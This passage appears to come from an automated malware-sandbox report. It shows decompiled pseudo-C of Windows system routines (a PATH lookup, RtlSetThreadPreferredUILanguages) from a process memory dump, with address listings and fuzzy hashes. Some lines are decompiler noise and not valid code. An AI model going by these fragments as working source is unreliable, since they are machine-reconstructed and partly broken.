                                                      									__eax = __ax & 0x0000ffff;
                                                      									__ebx = __ebx + 2;
                                                      									__eflags = __ebx;
                                                      									goto L53;
                                                      								}
                                                      								goto L14;
                                                      							case 1:
                                                      								L44:
                                                      								_t305 =  &_v64;
                                                      								_v80 = E017D2E3E(0,  &_v64);
                                                      								_t276 = _t276 + _v64 + 2;
                                                      								goto L13;
                                                      							case 2:
                                                      								__eax =  *0x1898480 & 0x0000ffff;
                                                      								__ebx = __ebx + __eax;
                                                      								__eflags = __dl;
                                                      								if(__eflags != 0) {
                                                      									__eax = 0x1898480;
                                                      									goto L90;
                                                      								}
                                                      								goto L14;
                                                      							case 3:
                                                      								__eax = E017BEEF0(0x18979a0);
                                                      								__eax =  &_v44;
                                                      								_push(__eax);
                                                      								_push(0);
                                                      								_push(0);
                                                      								_push(4);
                                                      								_push(L"PATH");
                                                      								_push(0);
                                                      								L67();
                                                      								__esi = __eax;
                                                      								_v68 = __esi;
                                                      								__eflags = __esi - 0xc0000023;
                                                      								if(__esi != 0xc0000023) {
                                                      									L10:
                                                      									__eax = E017BEB70(__ecx, 0x18979a0);
                                                      									__eflags = __esi - 0xc0000100;
                                                      									if(__eflags == 0) {
                                                      										_v44 = _v44 & 0x00000000;
                                                      										__eax = 0;
                                                      										_v68 = 0;
                                                      										goto L13;
                                                      									} else {
                                                      										__eflags = __esi;
                                                      										if(__esi < 0) {
                                                      											L32:
                                                      											_t213 = _v72;
                                                      											__eflags = _t213;
                                                      											if(_t213 != 0) {
                                                      												L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
                                                      											}
                                                      											_t214 = _v52;
                                                      											__eflags = _t214;
                                                      											if(_t214 != 0) {
                                                      												__eflags = _t324;
                                                      												if(_t324 < 0) {
                                                      													L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
                                                      													_t214 = 0;
                                                      												}
                                                      											}
                                                      											goto L36;
                                                      										} else {
                                                      											__eax = _v44;
                                                      											__ebx = __ebx + __eax * 2;
                                                      											__ebx = __ebx + 2;
                                                      											__eflags = __ebx;
                                                      											L13:
                                                      											_t285 = _v36;
                                                      											goto L14;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									__eax = _v44;
                                                      									__ecx =  *0x1897b9c; // 0x0
                                                      									_v44 + _v44 =  *[fs:0x30];
                                                      									__ecx = __ecx + 0x180000;
                                                      									__eax = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                      									_v72 = __eax;
                                                      									__eflags = __eax;
                                                      									if(__eax == 0) {
                                                      										__eax = E017BEB70(__ecx, 0x18979a0);
                                                      										__eax = _v52;
                                                      										L36:
                                                      										_pop(_t317);
                                                      										_pop(_t325);
                                                      										__eflags = _v8 ^ _t330;
                                                      										_pop(_t277);
                                                      										return E017EB640(_t214, _t277, _v8 ^ _t330, _t305, _t317, _t325);
                                                      									} else {
                                                      										__ecx =  &_v44;
                                                      										_push(__ecx);
                                                      										_push(_v44);
                                                      										_push(__eax);
                                                      										_push(4);
                                                      										_push(L"PATH");
                                                      										_push(0);
                                                      										L67();
                                                      										__esi = __eax;
                                                      										_v68 = __eax;
                                                      										goto L10;
                                                      									}
                                                      								}
                                                      								goto L118;
                                                      							case 4:
                                                      								__ebx = __ebx + 4;
                                                      								goto L14;
                                                      							case 5:
                                                      								_t272 = _v56;
                                                      								if(_v56 != 0) {
                                                      									_t305 =  &_v36;
                                                      									_t274 = E017D2E3E(_t272,  &_v36);
                                                      									_t285 = _v36;
                                                      									_v76 = _t274;
                                                      								}
                                                      								if(_t285 == 0) {
                                                      									goto L44;
                                                      								} else {
                                                      									_t276 = _t276 + 2 + _t285;
                                                      								}
                                                      								goto L14;
                                                      							case 6:
                                                      								__eax =  *0x1895764 & 0x0000ffff;
                                                      								goto L53;
                                                      							case 7:
                                                      								__eax =  *0x1898478 & 0x0000ffff;
                                                      								__ebx = __ebx + __eax;
                                                      								__eflags = _a8;
                                                      								if(_a8 != 0) {
                                                      									__ebx = __ebx + 0x16;
                                                      									__ebx = __ebx + __eax;
                                                      								}
                                                      								__eflags = __dl;
                                                      								if(__eflags != 0) {
                                                      									__eax = 0x1898478;
                                                      									L90:
                                                      									_v32 = __eax;
                                                      								}
                                                      								goto L14;
                                                      							case 8:
                                                      								__eax =  *0x1896e58 & 0x0000ffff;
                                                      								__eax = ( *0x1896e58 & 0x0000ffff) + 2;
                                                      								L53:
                                                      								__ebx = __ebx + __eax;
                                                      								L14:
                                                      								_t316 = _t316 + 1;
                                                      								if(_t316 >= _v48) {
                                                      									goto L16;
                                                      								} else {
                                                      									_t305 = _v37;
                                                      									goto L1;
                                                      								}
                                                      								goto L118;
                                                      						}
                                                      					}
                                                      					L56:
                                                      					_t290 = 0x25;
                                                      					asm("int 0x29");
                                                      					asm("out 0x28, al");
                                                      					if(__eflags < 0) {
                                                      						asm("o16 sub [ebp+0x1], bh");
                                                      					}
                                                      					_t105 =  &_v3;
                                                      					 *_t105 = _v3 - _t276;
                                                      					__eflags =  *_t105;
                                                      					asm("loopne 0x29");
                                                      					if(__eflags < 0) {
                                                      						if (__eflags >= 0) goto L62;
                                                      					}
                                                      					if(__eflags < 0) {
                                                      						_t323 = _t323 + 1;
                                                      						__eflags = _t323;
                                                      					}
                                                      					_v3 = _v3 - _t276;
                                                      					_pop(_t280);
                                                      					 *_t290 =  *_t290 + 0x17d2894;
                                                      					_v3 = _v3 - _t318;
                                                      					 *(_t239 + 0x1f017d26 ^ 0x0201815b) =  *(_t239 + 0x1f017d26 ^ 0x0201815b) - 0x7d;
                                                      					_t326 = _t323 + _t323;
                                                      					__eflags = _t326;
                                                      					asm("daa");
                                                      					if(_t326 < 0) {
                                                      						_push(ds);
                                                      					}
                                                      					_v3 = _v3 - _t280;
                                                      					_t327 = _t326 - 1;
                                                      					_t113 =  &_v3;
                                                      					 *_t113 = _v3 - _t280;
                                                      					__eflags =  *_t113;
                                                      					asm("daa");
                                                      					if( *_t113 < 0) {
                                                      						asm("fcomp dword [ebx-0x7f]");
                                                      					}
                                                      					_pop(_t281);
                                                      					 *_t290 =  *_t290 + 0x17d28b4;
                                                      					 *_t290 =  *_t290 + 0xcccccccc;
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					_push(0x20);
                                                      					_push(0x187ff00);
                                                      					E017FD08C(_t281, _t318, _t327);
                                                      					_v44 =  *[fs:0x18];
                                                      					_t319 = 0;
                                                      					 *_a24 = 0;
                                                      					_t282 = _a12;
                                                      					__eflags = _t282;
                                                      					if(_t282 == 0) {
                                                      						_t245 = 0xc0000100;
                                                      					} else {
                                                      						_v8 = 0;
                                                      						_t328 = 0xc0000100;
                                                      						_v52 = 0xc0000100;
                                                      						_t247 = 4;
                                                      						while(1) {
                                                      							_v40 = _t247;
                                                      							__eflags = _t247;
                                                      							if(_t247 == 0) {
                                                      								break;
                                                      							}
                                                      							_t295 = _t247 * 0xc;
                                                      							_v48 = _t295;
                                                      							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x1781664));
                                                      							if(__eflags <= 0) {
                                                      								if(__eflags == 0) {
                                                      									_t262 = E017EE5C0(_a8,  *((intOrPtr*)(_t295 + 0x1781668)), _t282);
                                                      									_t334 = _t334 + 0xc;
                                                      									__eflags = _t262;
                                                      									if(__eflags == 0) {
                                                      										_t328 = E018251BE(_t282,  *((intOrPtr*)(_v48 + 0x178166c)), _a16, _t319, _t328, __eflags, _a20, _a24);
                                                      										_v52 = _t328;
                                                      										break;
                                                      									} else {
                                                      										_t247 = _v40;
                                                      										goto L72;
                                                      									}
                                                      									goto L80;
                                                      								} else {
                                                      									L72:
                                                      									_t247 = _t247 - 1;
                                                      									continue;
                                                      								}
                                                      							}
                                                      							break;
                                                      						}
                                                      						_v32 = _t328;
                                                      						__eflags = _t328;
                                                      						if(_t328 < 0) {
                                                      							__eflags = _t328 - 0xc0000100;
                                                      							if(_t328 == 0xc0000100) {
                                                      								_t291 = _a4;
                                                      								__eflags = _t291;
                                                      								if(_t291 != 0) {
                                                      									_v36 = _t291;
                                                      									__eflags =  *_t291 - _t319;
                                                      									if( *_t291 == _t319) {
                                                      										_t328 = 0xc0000100;
                                                      										goto L86;
                                                      									} else {
                                                      										_t307 =  *((intOrPtr*)(_v44 + 0x30));
                                                      										_t249 =  *((intOrPtr*)(_t307 + 0x10));
                                                      										__eflags =  *((intOrPtr*)(_t249 + 0x48)) - _t291;
                                                      										if( *((intOrPtr*)(_t249 + 0x48)) == _t291) {
                                                      											__eflags =  *(_t307 + 0x1c);
                                                      											if( *(_t307 + 0x1c) == 0) {
                                                      												L116:
                                                      												_t328 = E017D2AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
                                                      												_v32 = _t328;
                                                      												__eflags = _t328 - 0xc0000100;
                                                      												if(_t328 != 0xc0000100) {
                                                      													goto L79;
                                                      												} else {
                                                      													_t319 = 1;
                                                      													_t291 = _v36;
                                                      													goto L85;
                                                      												}
                                                      											} else {
                                                      												_t252 = E017B6600( *(_t307 + 0x1c));
                                                      												__eflags = _t252;
                                                      												if(_t252 != 0) {
                                                      													goto L116;
                                                      												} else {
                                                      													_t291 = _a4;
                                                      													goto L85;
                                                      												}
                                                      											}
                                                      										} else {
                                                      											L85:
                                                      											_t328 = E017D2C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
                                                      											L86:
                                                      											_v32 = _t328;
                                                      											goto L79;
                                                      										}
                                                      									}
                                                      									goto L118;
                                                      								} else {
                                                      									E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      									_v8 = 1;
                                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                      									_t328 = _a24;
                                                      									_t259 = E017D2AE4( &_v36, _a8, _t282, _a16, _a20, _t328);
                                                      									_v32 = _t259;
                                                      									__eflags = _t259 - 0xc0000100;
                                                      									if(_t259 == 0xc0000100) {
                                                      										_v32 = E017D2C50(_v36, _a8, _t282, _a16, _a20, _t328, 1);
                                                      									}
                                                      									_v8 = _t319;
                                                      									E017D2ACB();
                                                      								}
                                                      							}
                                                      						}
                                                      						L79:
                                                      						_v8 = 0xfffffffe;
                                                      						_t245 = _t328;
                                                      					}
                                                      					L80:
                                                      					return E017FD0D1(_t245);
                                                      				}
                                                      				L118:
                                                      			}
                                                      0x017d28c3
                                                      0x017d28c8
                                                      0x017d28d2
                                                      0x017d28d4
                                                      0x017d28d8
                                                      0x017d28db
                                                      0x01815c26
                                                      0x01815c28
                                                      0x01815c2d
                                                      0x01815c2d
                                                      0x00000000
                                                      0x00000000
                                                      0x01815c34
                                                      0x01815c36
                                                      0x01815c49
                                                      0x01815c4e
                                                      0x01815c54
                                                      0x01815c5b
                                                      0x01815c5d
                                                      0x01815c60
                                                      0x017d2788
                                                      0x017d2788
                                                      0x017d278b
                                                      0x017d278e
                                                      0x017d278e
                                                      0x017d278e
                                                      0x017d2791
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2756
                                                      0x017d2750
                                                      0x00000000
                                                      0x017d2794
                                                      0x017d2794
                                                      0x017d2795
                                                      0x017d2798
                                                      0x017d2798
                                                      0x00000000
                                                      0x017d2734
                                                      0x017d272c
                                                      0x017d2700
                                                      0x017d25ef
                                                      0x017d25ef
                                                      0x017d25ef
                                                      0x017d25f2
                                                      0x017d25f8
                                                      0x00000000
                                                      0x00000000
                                                      0x017d25fe
                                                      0x00000000
                                                      0x017d28e6
                                                      0x017d28ec
                                                      0x017d28ef
                                                      0x017d28f5
                                                      0x017d28f8
                                                      0x017d28f8
                                                      0x00000000
                                                      0x017d28f8
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2866
                                                      0x017d2866
                                                      0x017d2876
                                                      0x017d2879
                                                      0x00000000
                                                      0x00000000
                                                      0x017d27e0
                                                      0x017d27e7
                                                      0x017d27e9
                                                      0x017d27eb
                                                      0x01815afd
                                                      0x00000000
                                                      0x01815afd
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2633
                                                      0x017d2638
                                                      0x017d263b
                                                      0x017d263c
                                                      0x017d263e
                                                      0x017d2640
                                                      0x017d2642
                                                      0x017d2647
                                                      0x017d2649
                                                      0x017d264e
                                                      0x017d2650
                                                      0x017d2653
                                                      0x017d2659
                                                      0x017d26a2
                                                      0x017d26a7
                                                      0x017d26ac
                                                      0x017d26b2
                                                      0x01815b11
                                                      0x01815b15
                                                      0x01815b17
                                                      0x00000000
                                                      0x017d26b8
                                                      0x017d26b8
                                                      0x017d26ba
                                                      0x017d27a6
                                                      0x017d27a6
                                                      0x017d27a9
                                                      0x017d27ab
                                                      0x017d27b9
                                                      0x017d27b9
                                                      0x017d27be
                                                      0x017d27c1
                                                      0x017d27c3
                                                      0x017d27c5
                                                      0x017d27c7
                                                      0x01815c74
                                                      0x01815c79
                                                      0x01815c79
                                                      0x017d27c7
                                                      0x00000000
                                                      0x017d26c0
                                                      0x017d26c0
                                                      0x017d26c3
                                                      0x017d26c6
                                                      0x017d26c6
                                                      0x017d26c9
                                                      0x017d26c9
                                                      0x00000000
                                                      0x017d26c9
                                                      0x017d26ba
                                                      0x017d265b
                                                      0x017d265b
                                                      0x017d265e
                                                      0x017d2667
                                                      0x017d266d
                                                      0x017d2677
                                                      0x017d267c
                                                      0x017d267f
                                                      0x017d2681
                                                      0x01815b49
                                                      0x01815b4e
                                                      0x017d27cd
                                                      0x017d27d0
                                                      0x017d27d1
                                                      0x017d27d2
                                                      0x017d27d4
                                                      0x017d27dd
                                                      0x017d2687
                                                      0x017d2687
                                                      0x017d268a
                                                      0x017d268b
                                                      0x017d268e
                                                      0x017d268f
                                                      0x017d2691
                                                      0x017d2696
                                                      0x017d2698
                                                      0x017d269d
                                                      0x017d269f
                                                      0x00000000
                                                      0x017d269f
                                                      0x017d2681
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2846
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2605
                                                      0x017d260a
                                                      0x017d260c
                                                      0x017d2611
                                                      0x017d2616
                                                      0x017d2619
                                                      0x017d2619
                                                      0x017d261e
                                                      0x00000000
                                                      0x017d2624
                                                      0x017d2627
                                                      0x017d2627
                                                      0x00000000
                                                      0x00000000
                                                      0x01815b1f
                                                      0x00000000
                                                      0x00000000
                                                      0x017d2894
                                                      0x017d289b
                                                      0x017d289d
                                                      0x017d28a1
                                                      0x01815b2b
                                                      0x01815b2e
                                                      0x01815b2e
                                                      0x017d28a7
                                                      0x017d28a9
                                                      0x01815b04
                                                      0x01815b09
                                                      0x01815b09
                                                      0x01815b09
                                                      0x00000000
                                                      0x00000000
                                                      0x01815b35
                                                      0x01815b3c
                                                      0x017d28fb
                                                      0x017d28fb
                                                      0x017d26cc
                                                      0x017d26cc
                                                      0x017d26d0
                                                      0x00000000
                                                      0x017d26d2
                                                      0x017d26d2
                                                      0x00000000
                                                      0x017d26d2
                                                      0x00000000
                                                      0x00000000
                                                      0x017d25fe
                                                      0x017d292d
                                                      0x017d292f
                                                      0x017d2930
                                                      0x017d2935
                                                      0x017d2937
                                                      0x017d2939
                                                      0x017d2939
                                                      0x017d293a
                                                      0x017d293a
                                                      0x017d293a
                                                      0x017d293d
                                                      0x017d293f
                                                      0x017d2941
                                                      0x017d2941
                                                      0x017d2942
                                                      0x017d2945
                                                      0x017d2945
                                                      0x017d2945
                                                      0x017d2946
                                                      0x017d294e
                                                      0x017d294f
                                                      0x017d295a
                                                      0x017d295d
                                                      0x017d2960
                                                      0x017d2960
                                                      0x017d2962
                                                      0x017d2963
                                                      0x017d2965
                                                      0x017d2965
                                                      0x017d2966
                                                      0x017d2969
                                                      0x017d296a
                                                      0x017d296a
                                                      0x017d296a
                                                      0x017d296e
                                                      0x017d296f
                                                      0x017d2971
                                                      0x017d2971
                                                      0x017d2972
                                                      0x017d2973
                                                      0x017d297b
                                                      0x017d2981
                                                      0x017d2982
                                                      0x017d2983
                                                      0x017d2984
                                                      0x017d2985
                                                      0x017d2986
                                                      0x017d2987
                                                      0x017d2988
                                                      0x017d2989
                                                      0x017d298a
                                                      0x017d298b
                                                      0x017d298c
                                                      0x017d298d
                                                      0x017d298e
                                                      0x017d298f
                                                      0x017d2990
                                                      0x017d2992
                                                      0x017d2997
                                                      0x017d29a3
                                                      0x017d29a6
                                                      0x017d29ab
                                                      0x017d29ad
                                                      0x017d29b0
                                                      0x017d29b2
                                                      0x01815c80
                                                      0x017d29b8
                                                      0x017d29b8
                                                      0x017d29bb
                                                      0x017d29c0
                                                      0x017d29c5
                                                      0x017d29c6
                                                      0x017d29c6
                                                      0x017d29c9
                                                      0x017d29cb
                                                      0x00000000
                                                      0x00000000
                                                      0x017d29cd
                                                      0x017d29d0
                                                      0x017d29d9
                                                      0x017d29db
                                                      0x017d29dd
                                                      0x017d2a7f
                                                      0x017d2a84
                                                      0x017d2a87
                                                      0x017d2a89
                                                      0x01815ca1
                                                      0x01815ca3
                                                      0x00000000
                                                      0x017d2a8f
                                                      0x017d2a8f
                                                      0x00000000
                                                      0x017d2a8f
                                                      0x00000000
                                                      0x017d29e3
                                                      0x017d29e3
                                                      0x017d29e3
                                                      0x00000000
                                                      0x017d29e3
                                                      0x017d29dd
                                                      0x00000000
                                                      0x017d29db
                                                      0x017d29e6
                                                      0x017d29e9
                                                      0x017d29eb
                                                      0x017d29ed
                                                      0x017d29f3
                                                      0x017d29f5
                                                      0x017d29f8
                                                      0x017d29fa
                                                      0x017d2a97
                                                      0x017d2a9a
                                                      0x017d2a9d
                                                      0x017d2add
                                                      0x00000000
                                                      0x017d2a9f
                                                      0x017d2aa2
                                                      0x017d2aa5
                                                      0x017d2aa8
                                                      0x017d2aab
                                                      0x01815cab
                                                      0x01815caf
                                                      0x01815cc5
                                                      0x01815cda
                                                      0x01815cdc
                                                      0x01815cdf
                                                      0x01815ce5
                                                      0x00000000
                                                      0x01815ceb
                                                      0x01815ced
                                                      0x01815cee
                                                      0x00000000
                                                      0x01815cee
                                                      0x01815cb1
                                                      0x01815cb4
                                                      0x01815cb9
                                                      0x01815cbb
                                                      0x00000000
                                                      0x01815cbd
                                                      0x01815cbd
                                                      0x00000000
                                                      0x01815cbd
                                                      0x01815cbb
                                                      0x017d2ab1
                                                      0x017d2ab1
                                                      0x017d2ac4
                                                      0x017d2ac6
                                                      0x017d2ac6
                                                      0x00000000
                                                      0x017d2ac6
                                                      0x017d2aab
                                                      0x00000000
                                                      0x017d2a00
                                                      0x017d2a09
                                                      0x017d2a0e
                                                      0x017d2a21
                                                      0x017d2a24
                                                      0x017d2a35
                                                      0x017d2a3a
                                                      0x017d2a3d
                                                      0x017d2a42
                                                      0x017d2a59
                                                      0x017d2a59
                                                      0x017d2a5c
                                                      0x017d2a5f
                                                      0x017d2a5f
                                                      0x017d29fa
                                                      0x017d29f3
                                                      0x017d2a64
                                                      0x017d2a64
                                                      0x017d2a6b
                                                      0x017d2a6b
                                                      0x017d2a6d
                                                      0x017d2a72
                                                      0x017d2a72
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: cb165d12db3e5da71dba7b543abacf75fc8657cdcc95c70c388ced79575bbf19
                                                      • Instruction ID: 5a18848d7f91d089aee092e52c51c95eb478b9601902d3173c8e19f5b8f945c7
                                                      • Opcode Fuzzy Hash: cb165d12db3e5da71dba7b543abacf75fc8657cdcc95c70c388ced79575bbf19
                                                      • Instruction Fuzzy Hash: 78C19E71E0021ADBDB25DFA9D880BAEFBB5FF49710F194029E901FB255D734A942CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E017DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                      				char _v5;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				char _v16;
                                                      				char _v17;
                                                      				char _v20;
                                                      				signed int _v24;
                                                      				char _v28;
                                                      				char _v32;
                                                      				signed int _v40;
                                                      				void* __ecx;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				signed int _t73;
                                                      				intOrPtr* _t75;
                                                      				signed int _t77;
                                                      				signed int _t79;
                                                      				signed int _t81;
                                                      				intOrPtr _t83;
                                                      				intOrPtr _t85;
                                                      				intOrPtr _t86;
                                                      				signed int _t91;
                                                      				signed int _t94;
                                                      				signed int _t95;
                                                      				signed int _t96;
                                                      				signed int _t106;
                                                      				signed int _t108;
                                                      				signed int _t114;
                                                      				signed int _t116;
                                                      				signed int _t118;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				void* _t129;
                                                      				signed int _t130;
                                                      				void* _t132;
                                                      				intOrPtr* _t134;
                                                      				signed int _t138;
                                                      				signed int _t141;
                                                      				signed int _t147;
                                                      				intOrPtr _t153;
                                                      				signed int _t154;
                                                      				signed int _t155;
                                                      				signed int _t170;
                                                      				void* _t174;
                                                      				signed int _t176;
                                                      				signed int _t177;
                                                      
                                                      				_t129 = __ebx;
                                                      				_push(_t132);
                                                      				_push(__esi);
                                                      				_t174 = _t132;
                                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                                      				if(_t73 >= 0) {
                                                      					L5:
                                                      					return _t73;
                                                      				} else {
                                                      					E017BEEF0(0x1897b60);
                                                      					_t134 =  *0x1897b84; // 0x77f07b80
                                                      					_t2 = _t174 + 0x24; // 0x24
                                                      					_t75 = _t2;
                                                      					if( *_t134 != 0x1897b80) {
                                                      						_push(3);
                                                      						asm("int 0x29");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						_push(0x1897b60);
                                                      						_t170 = _v8;
                                                      						_v28 = 0;
                                                      						_v40 = 0;
                                                      						_v24 = 0;
                                                      						_v17 = 0;
                                                      						_v32 = 0;
                                                      						__eflags = _t170 & 0xffff7cf2;
                                                      						if((_t170 & 0xffff7cf2) != 0) {
                                                      							L43:
                                                      							_t77 = 0xc000000d;
                                                      						} else {
                                                      							_t79 = _t170 & 0x0000000c;
                                                      							__eflags = _t79;
                                                      							if(_t79 != 0) {
                                                      								__eflags = _t79 - 0xc;
                                                      								if(_t79 == 0xc) {
                                                      									goto L43;
                                                      								} else {
                                                      									goto L9;
                                                      								}
                                                      							} else {
                                                      								_t170 = _t170 | 0x00000008;
                                                      								__eflags = _t170;
                                                      								L9:
                                                      								_t81 = _t170 & 0x00000300;
                                                      								__eflags = _t81 - 0x300;
                                                      								if(_t81 == 0x300) {
                                                      									goto L43;
                                                      								} else {
                                                      									_t138 = _t170 & 0x00000001;
                                                      									__eflags = _t138;
                                                      									_v24 = _t138;
                                                      									if(_t138 != 0) {
                                                      										__eflags = _t81;
                                                      										if(_t81 != 0) {
                                                      											goto L43;
                                                      										} else {
                                                      											goto L11;
                                                      										}
                                                      									} else {
                                                      										L11:
                                                      										_push(_t129);
                                                      										_t77 = E017B6D90( &_v20);
                                                      										_t130 = _t77;
                                                      										__eflags = _t130;
                                                      										if(_t130 >= 0) {
                                                      											_push(_t174);
                                                      											__eflags = _t170 & 0x00000301;
                                                      											if((_t170 & 0x00000301) == 0) {
                                                      												_t176 = _a8;
                                                      												__eflags = _t176;
                                                      												if(__eflags == 0) {
                                                      													L64:
                                                      													_t83 =  *[fs:0x18];
                                                      													_t177 = 0;
                                                      													__eflags =  *(_t83 + 0xfb8);
                                                      													if( *(_t83 + 0xfb8) != 0) {
                                                      														E017B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                      													}
                                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                      													goto L15;
                                                      												} else {
                                                      													asm("sbb edx, edx");
                                                      													_t114 = E01848938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                      													__eflags = _t114;
                                                      													if(_t114 < 0) {
                                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                      														E017AB150();
                                                      													}
                                                      													_t116 = E01846D81(_t176,  &_v16);
                                                      													__eflags = _t116;
                                                      													if(_t116 >= 0) {
                                                      														__eflags = _v16 - 2;
                                                      														if(_v16 < 2) {
                                                      															L56:
                                                      															_t118 = E017B75CE(_v20, 5, 0);
                                                      															__eflags = _t118;
                                                      															if(_t118 < 0) {
                                                      																L67:
                                                      																_t130 = 0xc0000017;
                                                      																goto L32;
                                                      															} else {
                                                      																__eflags = _v12;
                                                      																if(_v12 == 0) {
                                                      																	goto L67;
                                                      																} else {
                                                      																	_t153 =  *0x1898638; // 0x0
                                                      																	_t122 = L017B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                      																	_t154 = _v12;
                                                      																	_t130 = _t122;
                                                      																	__eflags = _t130;
                                                      																	if(_t130 >= 0) {
                                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                      																		__eflags = _t123;
                                                      																		if(_t123 != 0) {
                                                      																			_t155 = _a12;
                                                      																			__eflags = _t155;
                                                      																			if(_t155 != 0) {
                                                      																				 *_t155 = _t123;
                                                      																			}
                                                      																			goto L64;
                                                      																		} else {
                                                      																			E017B76E2(_t154);
                                                      																			goto L41;
                                                      																		}
                                                      																	} else {
                                                      																		E017B76E2(_t154);
                                                      																		_t177 = 0;
                                                      																		goto L18;
                                                      																	}
                                                      																}
                                                      															}
                                                      														} else {
                                                      															__eflags =  *_t176;
                                                      															if( *_t176 != 0) {
                                                      																goto L56;
                                                      															} else {
                                                      																__eflags =  *(_t176 + 2);
                                                      																if( *(_t176 + 2) == 0) {
                                                      																	goto L64;
                                                      																} else {
                                                      																	goto L56;
                                                      																}
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_t130 = 0xc000000d;
                                                      														goto L32;
                                                      													}
                                                      												}
                                                      												goto L35;
                                                      											} else {
                                                      												__eflags = _a8;
                                                      												if(_a8 != 0) {
                                                      													_t77 = 0xc000000d;
                                                      												} else {
                                                      													_v5 = 1;
                                                      													L017DFCE3(_v20, _t170);
                                                      													_t177 = 0;
                                                      													__eflags = 0;
                                                      													L15:
                                                      													_t85 =  *[fs:0x18];
                                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                      														L18:
                                                      														__eflags = _t130;
                                                      														if(_t130 != 0) {
                                                      															goto L32;
                                                      														} else {
                                                      															__eflags = _v5 - _t130;
                                                      															if(_v5 == _t130) {
                                                      																goto L32;
                                                      															} else {
                                                      																_t86 =  *[fs:0x18];
                                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                      																}
                                                      																__eflags = _t177;
                                                      																if(_t177 == 0) {
                                                      																	L31:
                                                      																	__eflags = 0;
                                                      																	L017B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                      																	goto L32;
                                                      																} else {
                                                      																	__eflags = _v24;
                                                      																	_t91 =  *(_t177 + 0x20);
                                                      																	if(_v24 != 0) {
                                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                      																		goto L31;
                                                      																	} else {
                                                      																		_t141 = _t91 & 0x00000040;
                                                      																		__eflags = _t170 & 0x00000100;
                                                      																		if((_t170 & 0x00000100) == 0) {
                                                      																			__eflags = _t141;
                                                      																			if(_t141 == 0) {
                                                      																				L74:
                                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                      																				goto L27;
                                                      																			} else {
                                                      																				_t177 = E017DFD22(_t177);
                                                      																				__eflags = _t177;
                                                      																				if(_t177 == 0) {
                                                      																					goto L42;
                                                      																				} else {
                                                      																					_t130 = E017DFD9B(_t177, 0, 4);
                                                      																					__eflags = _t130;
                                                      																					if(_t130 != 0) {
                                                      																						goto L42;
                                                      																					} else {
                                                      																						_t68 = _t177 + 0x20;
                                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                      																						__eflags =  *_t68;
                                                      																						_t91 =  *(_t177 + 0x20);
                                                      																						goto L74;
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																			goto L35;
                                                      																		} else {
                                                      																			__eflags = _t141;
                                                      																			if(_t141 != 0) {
                                                      																				_t177 = E017DFD22(_t177);
                                                      																				__eflags = _t177;
                                                      																				if(_t177 == 0) {
                                                      																					L42:
                                                      																					_t77 = 0xc0000001;
                                                      																					goto L33;
                                                      																				} else {
                                                      																					_t130 = E017DFD9B(_t177, 0, 4);
                                                      																					__eflags = _t130;
                                                      																					if(_t130 != 0) {
                                                      																						goto L42;
                                                      																					} else {
